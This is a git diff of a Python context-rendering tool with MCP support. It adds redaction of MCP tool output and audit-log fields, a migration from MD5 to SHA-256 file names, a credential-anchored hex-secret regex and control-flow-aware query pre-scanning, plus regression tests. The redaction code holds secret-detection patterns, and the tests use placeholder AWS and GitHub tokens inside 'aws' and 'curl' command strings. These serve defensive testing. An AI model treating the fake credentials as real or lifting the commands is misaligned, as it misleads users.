Look up the killer function. In the built single-file + # artifact every module's top-level symbol is at the + # global scope; in source-tree development we need an + # explicit module import. globals() lookup covers both. 
+ killer = globals().get("kill_active_subprocess_for_thread") + if killer is None: + try: + import perseus.directives.query as _q + killer = getattr(_q, "kill_active_subprocess_for_thread", None) + except ImportError: + killer = None + if killer is not None: + try: + killed = bool(killer(tid)) + except Exception: + killed = False + suffix = " (subprocess killed)" if killed else "" + return ( + f"Error executing {directive_name}: " + f"timed out after {timeout}s{suffix}" + ) + except Exception as exc: + # Error strings may include resolver-thrown exception messages, + # which can echo user content (e.g. argparse complaining about + # the command string). Redact defensively. + return _mcp_redact(f"Error executing {directive_name}: {exc}", cfg) + # #166: redact the tool result before returning to the MCP client. + return _mcp_redact(result, cfg) + finally: + # NEVER wait β€” on timeout the worker may be stuck for arbitrarily + # long. The thread is daemonic and won't block process exit. + executor.shutdown(wait=False, cancel_futures=True) # ── JSON-RPC 2.0 message handling ──────────────────────────────────────────── diff --git a/src/perseus/mneme_narrative.py b/src/perseus/mneme_narrative.py index 82836fe..384ed9a 100644 --- a/src/perseus/mneme_narrative.py +++ b/src/perseus/mneme_narrative.py @@ -37,10 +37,154 @@ def _workspace_hash(workspace: Path) -> str: return hashlib.sha256(str(canonical).encode()).hexdigest()[:12] +def _workspace_hash_legacy_md5(workspace: Path) -> str: + """12-char MD5 hex digest β€” the pre-1.0.3 narrative file name scheme. + + Regression for #128: prior to v1.0.3, MnΔ“mΔ“ derived narrative file names + from an MD5 hash. v1.0.3+ switched to SHA-256. Without an explicit + migration, every existing narrative file on disk was silently orphaned + on upgrade. ``_mneme_path`` calls this function as a one-shot fallback + to locate and rename legacy files. Once migrated, this code path is + never re-entered for that workspace. 
+ + We intentionally use ``usedforsecurity=False`` (Py3.9+) so FIPS-mode + Pythons don't reject the call - this is a file-naming hash, not a + security primitive. We fall back to the no-kwarg call for older Pythons. + """ + canonical = str(workspace.expanduser().resolve()).encode() + try: + return hashlib.md5(canonical, usedforsecurity=False).hexdigest()[:12] + except TypeError: + # Python < 3.9: no `usedforsecurity` kwarg. + return hashlib.md5(canonical).hexdigest()[:12] + + def _mneme_path(workspace: Path, cfg: dict) -> Path: - """Return the per-workspace narrative file path.""" + """Return the per-workspace narrative file path. + + Regression for #128: if a SHA-256 path doesn't exist but a legacy MD5 + path does, transparently rename the legacy file in place. This makes + upgrades from pre-1.0.3 lossless. + + The rename uses ``os.replace`` (atomic on POSIX/NTFS) and is best-effort: + if rename fails (cross-device, permission, etc.), we leave the legacy + file in place and return the SHA-256 path. The caller will then see "no + narrative yet" and recreate - non-fatal, but the prior content stays in + the legacy file until it is migrated. + Operators can also run ``perseus memory doctor --migrate`` to surface + and act on these cases explicitly. + """ + store = Path(cfg.get("memory", {}).get("store", str(PERSEUS_HOME / "memory"))) + new_path = store / f"{_workspace_hash(workspace)}.md" + if new_path.exists(): + return new_path + legacy_path = store / f"{_workspace_hash_legacy_md5(workspace)}.md" + if legacy_path.exists() and legacy_path != new_path: + try: + store.mkdir(parents=True, exist_ok=True) + os.replace(legacy_path, new_path) + except OSError: + # Cross-device / permission denied. Leave the legacy file in + # place so the operator can recover it manually; the caller will + # create a fresh narrative at the new path. + pass + return new_path + + +def _mneme_doctor_scan(cfg: dict) -> dict: + """Scan the memory store and report on narrative file inventory.
+ + Returns a dict with: + { + "store": str, # path to memory store + "narrative_files": [path, ...], # all *.md in store + "legacy_md5_files": [path, ...], # files whose name matches legacy MD5 of a known workspace + "sha256_files": [path, ...], # files that look like current-scheme files + "orphan_files": [path, ...], # files whose embedded `workspace` frontmatter no longer resolves to their filename + "unknown_files": [path, ...], # files whose stem isn't a 12-char hex hash + } + + "Known workspace" inference: we re-derive the SHA-256 and legacy MD5 + hashes from each file's ``workspace:`` frontmatter field, then match + against the actual filename stem. + + Used by ``perseus memory doctor`` to surface migration candidates. + """ store = Path(cfg.get("memory", {}).get("store", str(PERSEUS_HOME / "memory"))) - return store / f"{_workspace_hash(workspace)}.md" + out: dict = { + "store": str(store), + "narrative_files": [], + "legacy_md5_files": [], + "sha256_files": [], + "orphan_files": [], + "unknown_files": [], + } + if not store.exists(): + return out + hex_re = re.compile(r"^[a-f0-9]{12}$") + for fp in sorted(store.glob("*.md")): + out["narrative_files"].append(str(fp)) + stem = fp.stem + if not hex_re.match(stem): + out["unknown_files"].append(str(fp)) + continue + # Try to read the workspace from frontmatter and classify. + try: + fm, _ = _load_narrative(fp) + except Exception: + out["unknown_files"].append(str(fp)) + continue + ws_raw = str(fm.get("workspace", "")).strip() if isinstance(fm, dict) else "" + if not ws_raw: + # No workspace metadata β€” can't classify; treat as unknown. 
+ out["unknown_files"].append(str(fp)) + continue + try: + ws = Path(ws_raw).expanduser() + expected_sha = _workspace_hash(ws) + expected_md5 = _workspace_hash_legacy_md5(ws) + except Exception: + out["unknown_files"].append(str(fp)) + continue + if stem == expected_sha: + out["sha256_files"].append(str(fp)) + elif stem == expected_md5: + out["legacy_md5_files"].append(str(fp)) + else: + out["orphan_files"].append(str(fp)) + return out + + +def _mneme_doctor_migrate(cfg: dict) -> dict: + """Rename legacy MD5-named narrative files to their SHA-256 names. + + Returns a dict: + { + "migrated": [(old, new), ...], + "skipped": [(old, new, reason), ...], + "errors": [(old, exc_str), ...], + } + + Idempotent: re-running after a successful migration is a no-op. + """ + report: dict = {"migrated": [], "skipped": [], "errors": []} + scan = _mneme_doctor_scan(cfg) + store = Path(scan["store"]) + for legacy_fp_str in scan["legacy_md5_files"]: + legacy_fp = Path(legacy_fp_str) + try: + fm, _ = _load_narrative(legacy_fp) + ws = Path(str(fm.get("workspace", "")).strip()).expanduser() + new_fp = store / f"{_workspace_hash(ws)}.md" + if new_fp.exists(): + report["skipped"].append( + (str(legacy_fp), str(new_fp), "destination already exists") + ) + continue + os.replace(legacy_fp, new_fp) + report["migrated"].append((str(legacy_fp), str(new_fp))) + except Exception as exc: # pragma: no cover - defensive + report["errors"].append((str(legacy_fp), str(exc))) + return report def _load_narrative(path: Path) -> tuple[dict, str]: diff --git a/src/perseus/redaction.py b/src/perseus/redaction.py index fed0a1d..458ac2a 100644 --- a/src/perseus/redaction.py +++ b/src/perseus/redaction.py @@ -44,8 +44,19 @@ {"name": "jwt", "pattern": r"\beyJ[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}\b"}, # PEM private key block (covers RSA, EC, OPENSSH, generic) {"name": "private_key_block", "pattern": r"-----BEGIN (?:RSA |EC |OPENSSH |DSA |ENCRYPTED |PGP )?PRIVATE KEY-----[\s\S]*?-----END 
(?:RSA |EC |OPENSSH |DSA |ENCRYPTED |PGP )?PRIVATE KEY-----"}, - # Hex-encoded high-entropy strings of 40+ chars used as secrets/api hashes - {"name": "long_hex_secret", "pattern": r"\b[a-fA-F0-9]{40,}\b"}, + # Hex-encoded high-entropy strings of 40+ chars in an obvious credential + # context (assigned to a `secret=`, `token=`, `key=`, `password=`, + # `api_key=` slot, or quoted after a colon in JSON/YAML). + # + # IMPORTANT: a bare `\b[a-fA-F0-9]{40,}\b` rule (pre-1.0.6 default) was a + # landmine - it matched git commit SHAs (40 hex chars), SHA-256 sums (64 + # hex chars), Docker digests, and Atlassian content hashes, silently + # destroying forensically important data in `@query "git log"` output + # and similar. This rule now requires an explicit credential anchor. + # See: https://github.com/tcconnally/perseus/issues/136 + {"name": "long_hex_secret", + "pattern": r"(?i)(?:secret|token|key|password|passwd|api[_-]?key|auth(?:orization)?)\s*[:=]\s*[\"']?([a-fA-F0-9]{40,})[\"']?", + "_anchor_group": 1}, # HuggingFace: hf_... (read/write tokens) {"name": "huggingface_token", "pattern": r"\bhf_[A-Za-z0-9]{30,}\b"}, # Google Cloud API key: AIza... @@ -109,7 +120,19 @@ def _compile_redaction_rules(cfg: dict) -> list[dict]: replacement = rule.get("replacement") if not replacement: replacement = f"[REDACTED:{name}]" - compiled.append({"name": name, "regex": regex, "replacement": str(replacement)}) + # `_anchor_group` (rule-internal, default None): index of the capture + # group holding the SECRET payload (everything outside that group is + # context that must be preserved verbatim). Used by the + # credential-anchored `long_hex_secret` rule. When unset, fall back to legacy + # behavior: group(1) (if present) is treated as a leading prefix to + # preserve and the rest of the match is replaced.
+ anchor_group = rule.get("_anchor_group") + compiled.append({ + "name": name, + "regex": regex, + "replacement": str(replacement), + "anchor_group": anchor_group, + }) return compiled @@ -143,12 +166,29 @@ def redact_text(text: str, cfg: dict) -> tuple[str, dict]: name = rule["name"] regex = rule["regex"] # subn returns (new, n); use a callable replacement so groupref-style - # rules (e.g. the bearer header rule that preserves the prefix via - # group 1) work consistently. - def _sub(match, _repl=rule["replacement"]): + # rules work consistently. + # + # Three modes: + # 1. `anchor_group=N`: the captured group at index N is the SECRET + # payload. Replace only that span; preserve everything else + # verbatim. Used by the credential-anchored `long_hex_secret` rule. + # 2. `match.lastindex` set (no anchor_group): legacy behavior - the + # first capture group is a prefix to preserve, everything after + # the prefix is replaced. Used by `bearer_header`. + # 3. No capture groups: replace the whole match. + def _sub(match, _repl=rule["replacement"], _ag=rule.get("anchor_group")): + if _ag is not None: + try: + span_start, span_end = match.span(_ag) + except (IndexError, re.error): + return _repl + if span_start < 0: + return _repl + full = match.group(0) + rel_start = span_start - match.start() + rel_end = span_end - match.start() + return full[:rel_start] + _repl + full[rel_end:] if match.lastindex: - # Preserve any leading captured group verbatim (e.g. the - # `Authorization: Bearer ` prefix); everything else is wiped.
return match.group(1) + _repl return _repl out, n = regex.subn(_sub, out) diff --git a/src/perseus/renderer.py b/src/perseus/renderer.py index 32dd29b..9cb450e 100644 --- a/src/perseus/renderer.py +++ b/src/perseus/renderer.py @@ -759,11 +759,37 @@ def _render_lines( _integrity_snapshot = _capture_file_snapshot(lines, workspace) # ── Pre-scan @query directives for parallel resolution ────────────── + # + # #165 (v1.0.6): pre-scan is now control-flow aware. Pre-1.0.6 the + # scan walked every line ignoring @if/@else/@endif, so a @query + # inside a false conditional branch still pre-executed in parallel: + # + # @if production + # @query "aws s3 ls s3://prod-data" # <-- still ran in dev! + # @endif + # + # Fix: a single pass tracks @if/@else/@endif depth and evaluates + # each condition exactly once via `evaluate_condition`. Lines inside + # an inactive branch (or inside a malformed/uneval block) are + # skipped during query enqueueing. The main render loop below + # re-evaluates conditions independently, so a transient inconsistency + # in evaluation between pre-scan and main loop only manifests as a + # cache miss β€” never as a query running when it shouldn't, and never + # as a query failing to run when it should. query_results: dict[int, str] = {} if top_level and cfg["render"].get("parallel_queries", False): in_fence_pre = False fc_pre = "" fl_pre = 0 + # Stack of (active: bool, in_else_branch: bool) tuples β€” one + # entry per open @if. A branch is "active" when its enclosing + # condition is True (and the current line is on the active side). + # If ANY frame on the stack is inactive, the line is inactive. 
+ if_stack: list[tuple[bool, bool]] = [] + + def _all_active() -> bool: + return all(active for active, _ in if_stack) + for idx, raw_line in enumerate(lines): fm = re.match(r'^\s*(`{3,}|~{3,})(.*)$', raw_line) if in_fence_pre: @@ -775,6 +801,42 @@ def _render_lines( fc_pre = fm.group(1)[0] fl_pre = len(fm.group(1)) continue + + # Control-flow tracking β€” applies regardless of active state. + m_if_pre = IF_RE.match(raw_line) + if m_if_pre: + try: + cond_val = bool(evaluate_condition( + m_if_pre.group(1).strip(), workspace, cfg + )) + except Exception: + # Match the main loop's failure mode: render emits a + # warning and skips both branches. We skip enqueueing + # in both branches by marking this frame inactive. + cond_val = False + # Push: active = parent_active AND own condition; not in else yet. + parent_active = _all_active() + if_stack.append((parent_active and cond_val, False)) + continue + if ELSE_RE.match(raw_line): + if if_stack: + parent_frames = if_stack[:-1] + parent_active = all(a for a, _ in parent_frames) + own_active, _ = if_stack[-1] + # Else branch is active iff parent is active and own + # branch was NOT active (i.e. the @if condition was false). + if_stack[-1] = (parent_active and not own_active, True) + continue + if ENDIF_RE.match(raw_line): + if if_stack: + if_stack.pop() + continue + + # Past this point, we only enqueue queries when ALL enclosing + # @if frames are active. 
+ if not _all_active(): + continue + m = INLINE_DIRECTIVE_RE.match(raw_line) if m and m.group(1).lower() == "@query": clean_args, cache_mode, cache_ttl, cache_mock = _parse_cache_modifier( diff --git a/tests/test_audit_log.py b/tests/test_audit_log.py index 6520116..6251f75 100644 --- a/tests/test_audit_log.py +++ b/tests/test_audit_log.py @@ -215,6 +215,91 @@ def test_audit_log_never_contains_raw_secret(tmp_path, monkeypatch): assert "\"event_type\": \"redaction\"" in audit_text +# ── regression: #137 audit field values must be redacted ──────────────────── + + +def _setup_redaction_home(home: Path, monkeypatch) -> tuple[Path, dict]: + """Set up an isolated PERSEUS_HOME and return (audit_log_path, cfg). + + Uses the standard test pattern from `test_audit_log_never_contains_raw_secret` + β€” monkeypatches PERSEUS_HOME so `_audit_log_path` accepts the location. + """ + home.mkdir(exist_ok=True) + monkeypatch.setattr(perseus, "PERSEUS_HOME", home) + log_path = home / "audit_log.jsonl" + cfg = { + "audit": { + "enabled": True, + "log_path": str(log_path), + "max_log_bytes": 1_048_576, + }, + "redaction": {"enabled": True}, + } + return log_path, cfg + + +def test_audit_event_redacts_aws_key_in_command_field(tmp_path, monkeypatch): + """Regression for #137 β€” AWS access key in audit.command must be redacted.""" + log_path, cfg = _setup_redaction_home(tmp_path / "home", monkeypatch) + aws_key = "AKIAIOSFODNN7EXAMPLE" + perseus.audit_event(cfg, "shell_exec", + directive="@query", + command=f"aws s3 cp s3://b/k . 
--access-key {aws_key}") + log_text = log_path.read_text() + assert aws_key not in log_text, ( + f"AWS key leaked to audit log:\n{log_text}" + ) + assert "REDACTED" in log_text + + +def test_audit_event_redacts_bearer_token_in_command_field(tmp_path, monkeypatch): + """Regression for #137 β€” bearer tokens in audit.command must be redacted.""" + log_path, cfg = _setup_redaction_home(tmp_path / "home", monkeypatch) + token = "ghp_" + "Z" * 36 + perseus.audit_event(cfg, "shell_exec", + directive="@query", + command=f"curl -H 'Authorization: Bearer {token}'") + log_text = log_path.read_text() + assert token not in log_text + + +def test_audit_event_does_not_redact_structural_fields(tmp_path, monkeypatch): + """Structural fields (directive, exit_code, etc.) must pass through verbatim.""" + log_path, cfg = _setup_redaction_home(tmp_path / "home", monkeypatch) + perseus.audit_event(cfg, "shell_exec", + directive="@query", + exit_code=42, + duration_ms=1234) + entry = json.loads(log_path.read_text().strip()) + assert entry["directive"] == "@query" + assert entry["exit_code"] == 42 + assert entry["duration_ms"] == 1234 + + +def test_audit_event_redact_fields_can_be_disabled(tmp_path, monkeypatch): + """Forensic mode: audit.redact_fields=false preserves raw values.""" + log_path, cfg = _setup_redaction_home(tmp_path / "home", monkeypatch) + cfg["audit"]["redact_fields"] = False + aws_key = "AKIAIOSFODNN7EXAMPLE" + perseus.audit_event(cfg, "shell_exec", + directive="@query", + command=f"aws sts --key {aws_key}") + log_text = log_path.read_text() + assert aws_key in log_text # opt-out works + + +def test_audit_event_walks_nested_dict_fields(tmp_path, monkeypatch): + """Nested structures (dicts/lists) are walked recursively for redaction.""" + log_path, cfg = _setup_redaction_home(tmp_path / "home", monkeypatch) + token = "ghp_" + "Y" * 36 + perseus.audit_event(cfg, "model_call", + directive="@perseus", + env={"GITHUB_TOKEN": token, "DEBUG": "1"}, + argv=["curl", "-H", 
f"Authorization: Bearer {token}"]) + log_text = log_path.read_text() + assert token not in log_text + + # ── integration: `perseus trust audit` subcommand ─────────────────────────── diff --git a/tests/test_bugfix_165_parallel_queries_control_flow.py b/tests/test_bugfix_165_parallel_queries_control_flow.py new file mode 100644 index 0000000..648a700 --- /dev/null +++ b/tests/test_bugfix_165_parallel_queries_control_flow.py @@ -0,0 +1,240 @@ +""" +Regression suite for #165 β€” parallel_queries control-flow bypass. + +Pre-v1.0.6, the renderer's `parallel_queries` pre-scan walked every line +ignoring @if/@else/@endif, so a @query inside a false conditional branch +still pre-executed in parallel: + + @if production + @query "aws s3 ls s3://prod-data" # <-- still ran in dev! + @endif + +This was a control-flow bypass that undermined the documented @if/@else +security model. + +These tests assert: +1. @query in a false @if branch does NOT execute even with parallel_queries=True +2. @query in a true @if branch DOES execute (no regression on the happy path) +3. @query in the else branch when @if is false DOES execute +4. Nested @if/@endif respect ancestor branches correctly +5. Behavior is identical between parallel_queries=True and False +6. 
Malformed @if (uneval condition) skips both branches in pre-scan +""" +import os +import tempfile +import time +from pathlib import Path + +import pytest +import yaml +import perseus + + +# ── Test infrastructure ─────────────────────────────────────────────────────── + +def _cfg(allow_query: bool = True, parallel: bool = True) -> dict: + """Build a minimal config that enables @query + parallel_queries.""" + c = dict(perseus.DEFAULT_CONFIG) + for section, vals in perseus.DEFAULT_CONFIG.items(): + c[section] = dict(vals) if isinstance(vals, dict) else vals + c["render"]["allow_query_shell"] = allow_query + c["render"]["parallel_queries"] = parallel + return c + + +@pytest.fixture +def workspace(tmp_path: Path) -> Path: + ws = tmp_path / "ws" + (ws / ".perseus").mkdir(parents=True) + return ws + + +@pytest.fixture +def marker_path(tmp_path: Path) -> Path: + """A path that should NOT exist after a render where the @query is gated off.""" + return tmp_path / "marker_should_not_exist" + + +def _render(lines: list[str], cfg: dict, workspace: Path) -> str: + """Convenience: render a list of lines through the public API. + + Always prepends the `@perseus` header - without it, the renderer + treats the input as plain text and never resolves directives. + """ + source = "\n".join(["@perseus", *lines]) + return perseus.render_source(source, cfg, workspace=workspace) + + +# ── 1. @query in false @if branch is NOT pre-executed ──────────────────────── + +def test_query_in_false_if_branch_does_not_run_with_parallel_queries( + workspace, marker_path +): + """Core #165 regression: @if false / @query / @endif must not run the @query + even when parallel_queries=True.""" + cfg = _cfg(parallel=True) + # Use a uniquely-named marker so we know this test created it (not noise).
+ marker = str(marker_path) + lines = [ + "@if env.set NONEXISTENT_VAR_FOR_TEST_165", + f'@query "echo SHOULD_NOT_RUN > {marker}"', + "@endif", + ] + + assert not marker_path.exists(), "Pre-condition: marker should not exist yet" + _render(lines, cfg, workspace) + # The whole point: marker must not have been created. + assert not marker_path.exists(), ( + f"#165 regression: @query in false @if branch executed despite " + f"parallel_queries=True. Marker file was created at {marker_path}." + ) + + +# ── 2. @query in true @if branch DOES run ──────────────────────────────────── + +def test_query_in_true_if_branch_still_runs_with_parallel_queries( + workspace, tmp_path +): + """No regression on the happy path: @if true / @query must still run.""" + cfg = _cfg(parallel=True) + marker = tmp_path / "marker_should_exist" + # 'env.set HOME' is always true in any normal test environment. + lines = [ + "@if env.set HOME", + f'@query "echo SHOULD_RUN > {marker}"', + "@endif", + ] + + output = _render(lines, cfg, workspace) + # Give a moment for the parallel pre-scan thread to fire (it's synchronous + # to render_source - but the subprocess may take a tick to flush). + assert marker.exists(), ( + f"@query in true @if branch did NOT execute under parallel_queries=True.\n" + f"Output: {output!r}" + ) + + +# ── 3. @query in else branch when @if is false DOES run ─────────────────────── + +def test_query_in_else_branch_runs_when_if_is_false(workspace, tmp_path): + """Else branch is active when @if is false.
The @query there must run.""" + cfg = _cfg(parallel=True) + marker = tmp_path / "marker_else_branch" + # 'env.set NONEXISTENT_VAR_FOR_TEST' is reliably false + lines = [ + "@if env.set NONEXISTENT_VAR_FOR_TEST_165", + '@query "echo IF_BRANCH"', + "@else", + f'@query "echo ELSE_BRANCH > {marker}"', + "@endif", + ] + + output = _render(lines, cfg, workspace) + assert marker.exists(), ( + f"@query in else branch did NOT execute when @if was false.\n" + f"Output: {output!r}" + ) + + +def test_query_in_if_branch_skipped_when_else_taken(workspace, tmp_path): + """The reverse: if-branch @query does NOT run when @if is false (else taken).""" + cfg = _cfg(parallel=True) + marker_if = tmp_path / "marker_if_should_not_run" + marker_else = tmp_path / "marker_else_should_run" + lines = [ + "@if env.set NONEXISTENT_VAR_FOR_TEST_165", + f'@query "echo IF_BRANCH > {marker_if}"', + "@else", + f'@query "echo ELSE > {marker_else}"', + "@endif", + ] + + _render(lines, cfg, workspace) + assert not marker_if.exists(), "#165: @query in skipped if-branch ran" + assert marker_else.exists(), "@query in active else-branch did not run" + + +# ── 4. Nested @if respects ancestor branches ───────────────────────────────── + +def test_nested_if_inactive_outer_means_inner_query_does_not_run( + workspace, tmp_path +): + """If outer @if is false, the @query inside the (true) inner @if still must + not run - the entire nested block is inactive.""" + cfg = _cfg(parallel=True) + marker = tmp_path / "marker_nested_should_not_run" + lines = [ + "@if env.set NONEXISTENT_VAR_FOR_TEST_165", + "@if env.set HOME", + f'@query "echo NESTED > {marker}"', + "@endif", + "@endif", + ] + + _render(lines, cfg, workspace) + assert not marker.exists(), ( + "#165: nested @query under a false outer @if executed."
+ ) + + +def test_nested_if_active_outer_and_inner_means_query_runs(workspace, tmp_path): + """Both outer and inner @if true → @query runs (no regression on nested + happy path).""" + cfg = _cfg(parallel=True) + marker = tmp_path / "marker_nested_should_run" + lines = [ + "@if env.set HOME", + "@if env.set HOME", + f'@query "echo NESTED_OK > {marker}"', + "@endif", + "@endif", + ] + + _render(lines, cfg, workspace) + assert marker.exists(), "Nested @query under true/true did not run" + + +# ── 5. Behavior parity with parallel_queries=False ──────────────────────────── + +def test_parallel_false_also_skips_query_in_false_branch(workspace, tmp_path): + """Sanity: parallel_queries=False has always respected @if. The point of + this test is to confirm the same observable behavior under True after the + #165 fix.""" + marker = tmp_path / "marker_serial_should_not_run" + cfg = _cfg(parallel=False) + lines = [ + "@if env.set NONEXISTENT_VAR_FOR_TEST_165", + f'@query "echo SERIAL > {marker}"', + "@endif", + ] + + _render(lines, cfg, workspace) + assert not marker.exists(), ( + "Serial mode @query in false @if branch ran - pre-existing bug " + "if this fails (would mean the bug was wider than #165)." + ) + + +# ── 6. Malformed/uneval @if condition skips both branches in pre-scan ──────── + +def test_malformed_if_condition_skips_query_enqueue_in_pre_scan( + workspace, tmp_path +): + """If the condition can't be evaluated, the pre-scan must NOT enqueue + any @query in either branch. The main render loop will emit a warning + and skip the block entirely.""" + cfg = _cfg(parallel=True) + marker = tmp_path / "marker_malformed_should_not_run" + lines = [ + "@if this is not a valid condition syntax", + f'@query "echo MALFORMED > {marker}"', + "@endif", + ] + + _render(lines, cfg, workspace) + # The main loop will surface a "> ⚠ @if error:" message AND not execute + # the @query. The pre-scan must agree.
+ assert not marker.exists(), ( + "#165: pre-scan enqueued @query under malformed @if; the query ran " + "even though the @if itself was uneval and the main loop skipped it." + ) diff --git a/tests/test_bugfix_166_mcp_redaction.py b/tests/test_bugfix_166_mcp_redaction.py new file mode 100644 index 0000000..1c6d688 --- /dev/null +++ b/tests/test_bugfix_166_mcp_redaction.py @@ -0,0 +1,224 @@ +""" +Regression suite for #166 - MCP tool responses bypass final redaction. + +Pre-v1.0.6: +- `perseus_get_context` called `render_source` (which does NOT apply + redaction) instead of `render_output` (which does). +- All other tool resolvers (`perseus_read`, `perseus_query`, etc.) + returned raw resolver output via `_call_resolver`, never passing + through the redaction pipeline. + +Result: secrets configured in `redaction.patterns` leaked through MCP +to the connected client (Claude Desktop, Rovo Dev, etc.) - even when +`redaction.enabled: true` was set in config. + +These tests assert that every MCP tool return path applies redaction. +""" +import json +import os +from pathlib import Path +from unittest.mock import patch + +import pytest +import yaml +import perseus + + +SECRET_NEEDLE = "SUPER_SECRET_TOKEN_123_ABC_XYZ" + + +def _cfg(redaction_enabled: bool = True, allow_query: bool = True) -> dict: + """Build a minimal config with a redaction pattern that matches our needle.""" + c = dict(perseus.DEFAULT_CONFIG) + for section, vals in perseus.DEFAULT_CONFIG.items(): + c[section] = dict(vals) if isinstance(vals, dict) else vals + c["redaction"]["enabled"] = redaction_enabled + # Add a custom rule that catches our test needle exactly.
+ c["redaction"].setdefault("patterns", []).append({ + "name": "test_secret_needle", + "pattern": SECRET_NEEDLE, + "replacement": "[REDACTED:test_secret_needle]", + }) + c["render"]["allow_query_shell"] = allow_query + c["mcp"] = c.get("mcp", {}) + c["mcp"]["tool_allowlist"] = [ + "perseus_query", "perseus_read", "perseus_date", "perseus_health", + "perseus_get_context", "perseus_get_health", + ] + return c + + +@pytest.fixture +def workspace_with_context(tmp_path: Path) -> Path: + """Workspace whose context.md contains the secret needle.""" + ws = tmp_path / "ws" + (ws / ".perseus").mkdir(parents=True) + (ws / ".perseus" / "context.md").write_text( + f"@perseus\n\nMy AWS token is {SECRET_NEEDLE}.\n" + ) + return ws + + +# ── 1. perseus_get_context redacts ─────────────────────────────────────────── + +def test_perseus_get_context_redacts_secret(workspace_with_context): + """#166 primary regression: perseus_get_context must redact the secret + that appears in context.md.""" + cfg = _cfg(redaction_enabled=True) + result = perseus._call_tool( + "perseus_get_context", {"format": "markdown"}, cfg, workspace_with_context + ) + assert SECRET_NEEDLE not in result, ( + f"#166: secret leaked through perseus_get_context. Result:\n{result}" + ) + assert "[REDACTED:test_secret_needle]" in result + + +def test_perseus_get_context_json_format_redacts(workspace_with_context): + """Same regression in JSON format - the embedded `resolved` field + must be redacted before serialization.""" + cfg = _cfg(redaction_enabled=True) + result = perseus._call_tool( + "perseus_get_context", {"format": "json"}, cfg, workspace_with_context + ) + payload = json.loads(result) + assert SECRET_NEEDLE not in payload["resolved"] + assert "[REDACTED:test_secret_needle]" in payload["resolved"] + + +def test_perseus_get_context_preserves_secret_when_redaction_disabled( + workspace_with_context +): + """Sanity: with redaction.enabled=False, the secret IS present.
+ This proves the test setup actually exercises the secret path.""" + cfg = _cfg(redaction_enabled=False) + result = perseus._call_tool( + "perseus_get_context", {"format": "markdown"}, cfg, workspace_with_context + ) + assert SECRET_NEEDLE in result, ( + "Sanity check failed: without redaction, secret should be visible" + ) + + +# ── 2. perseus_query result redacts ────────────────────────────────────────── + +def test_perseus_query_result_redacts_secret(tmp_path): + """A @query whose stdout contains the secret needle must have the + needle redacted before reaching the MCP client.""" + cfg = _cfg(redaction_enabled=True, allow_query=True) + ws = tmp_path / "ws" + (ws / ".perseus").mkdir(parents=True) + # The query echoes the secret needle to stdout. + result = perseus._call_tool( + "perseus_query", + {"command": f"echo {SECRET_NEEDLE}"}, + cfg, ws, + ) + assert SECRET_NEEDLE not in result, ( + f"#166: @query stdout leaked the secret through MCP. Result:\n{result}" + ) + + +# ── 3. perseus_read result redacts ─────────────────────────────────────────── + +def test_perseus_read_result_redacts_secret(tmp_path): + """A @read of a file containing the secret needle must be redacted.""" + cfg = _cfg(redaction_enabled=True) + ws = tmp_path / "ws" + (ws / ".perseus").mkdir(parents=True) + secret_file = ws / "secrets.txt" + secret_file.write_text(f"token: {SECRET_NEEDLE}\n") + + result = perseus._call_tool( + "perseus_read", {"path": "secrets.txt"}, cfg, ws, + ) + assert SECRET_NEEDLE not in result, ( + f"#166: @read leaked the secret through MCP. Result:\n{result}" + ) + + +# ── 4.
Error paths redact ──────────────────────────────────────────────────── + +def test_call_tool_exception_path_redacts(tmp_path): + """If the resolver raises with a message that echoes user content + containing the secret, the error string must still be redacted.""" + cfg = _cfg(redaction_enabled=True) + ws = tmp_path / "ws" + (ws / ".perseus").mkdir(parents=True) + + # Force _call_resolver to raise with a secret-bearing message. + def _boom(*args, **kwargs): + raise RuntimeError(f"boom: user passed {SECRET_NEEDLE}") + + with patch.object(perseus, "_call_resolver", side_effect=_boom): + result = perseus._call_tool( + "perseus_date", {"format": "iso"}, cfg, ws, + ) + assert SECRET_NEEDLE not in result, ( + f"#166: exception path leaked secret. Result:\n{result}" + ) + assert "Error executing" in result # Sanity: still surfaces the error + + +# ── 5. perseus_get_health result redacts ───────────────────────────────────── + +def test_perseus_get_health_redacts(tmp_path, monkeypatch): + """perseus_get_health path (legacy resolver shortcut) also redacts.""" + cfg = _cfg(redaction_enabled=True) + ws = tmp_path / "ws" + (ws / ".perseus").mkdir(parents=True) + + # Stub the @health resolver to return a secret. + health_spec = perseus.DIRECTIVE_REGISTRY.get("@health") + if health_spec is None or health_spec.resolver is None: + pytest.skip("@health not registered in this build") + + # DirectiveSpec is frozen - patch via monkeypatching the spec in the + # registry instead. + def _stub(*args, **kwargs): + return f"health OK; token={SECRET_NEEDLE}" + + new_spec = health_spec._replace(resolver=_stub) if hasattr(health_spec, "_replace") else None + if new_spec is None: + pytest.skip("DirectiveSpec is not a NamedTuple - cannot stub resolver") + monkeypatch.setitem(perseus.DIRECTIVE_REGISTRY, "@health", new_spec) + result = perseus._call_tool( + "perseus_get_health", {}, cfg, ws, + ) + assert SECRET_NEEDLE not in result, ( + f"#166: perseus_get_health leaked secret.
Result:\n{result}" + ) + + +# ── 6. _mcp_redact unit tests ──────────────────────────────────────────────── + +def test_mcp_redact_returns_unchanged_when_disabled(): + """If redaction.enabled=False, _mcp_redact returns input unchanged.""" + cfg = _cfg(redaction_enabled=False) + assert perseus._mcp_redact(f"hello {SECRET_NEEDLE}", cfg) == f"hello {SECRET_NEEDLE}" + + +def test_mcp_redact_returns_non_str_unchanged(): + """Non-string inputs should not be mangled (defensive type guard).""" + cfg = _cfg(redaction_enabled=True) + assert perseus._mcp_redact(None, cfg) is None + assert perseus._mcp_redact(42, cfg) == 42 + assert perseus._mcp_redact({"k": "v"}, cfg) == {"k": "v"} + + +def test_mcp_redact_swallows_redactor_exceptions(): + """If the underlying redactor raises, _mcp_redact returns the original + (defensive - better to leak in a known-broken redactor than to crash + the MCP server).""" + cfg = _cfg(redaction_enabled=True) + # Inject a broken pattern that will raise during compile. + cfg["redaction"]["patterns"].append({ + "name": "broken_re", + "pattern": "(unclosed group", # invalid regex + }) + # Should not raise - should return something reasonable. + out = perseus._mcp_redact("safe text", cfg) + # Either returns input unchanged (defensive) or the redactor handled + # the bad pattern gracefully - both are acceptable. The key assertion + # is no exception.
